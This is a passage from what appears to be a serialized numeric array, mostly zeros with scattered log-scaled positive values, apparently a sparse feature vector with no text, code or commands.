0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.645446897643238, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 5.0301047650807, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.6931471805599453, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 3.4825185607408002, 0, 3.970291913552122, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0, \n 4.182806904693497, 3.58351893845611, 0, 0, 0.0, 0.0, 1.7412592803704001,\n 0.0, 0.0, 0.0, 0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 2.833213344056216, 0, 0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.101797476893978, 0, 5.375278407684164, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.2188758248682006, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 3.871201010907891, 0, \n 0.0, 0.0, 0, 0.0, 3.295836866004329, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 1.6094379124341003, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5263605246161616, 0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 1.6094379124341003, 0, 3.713572066704308, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 3.4011973816621555, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 3.0841946160253877, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 1.3862943611198906, 2.9444389791664403, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.0986122886681098, 0.0, 0.0, 0, 4.581130849408909, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 2.1972245773362196, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 0.0, \n 2.302585092994046, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.95562797505323, \n 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 4.189654742026425, 0, 3.6375861597263857, 0, 0, 0, 0.0, \n 1.791759469228055, 0.0, 0, 0.0, 4.8991863767100545, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.93848385770662, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, \n 2.9957322735539913, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8005740880419454,\n 0, 0.0, 2.8903717578961645, 0.0, 0.0, 0, 0.0, 0.0, 2.0794415416798357, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 2.550898738446989, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 1.0986122886681098, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.6390573296152584, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 3.9318256327243257, 3.5263605246161616, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 4.624972813284271, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.3694478524670215, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0, 1.9459101490553132, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 2.772588722239781, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 4.61512051684126, 0.0, 0.0, 0.0, 4.624972813284271, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, \n 3.828641396489095, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 6.423390507494619, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 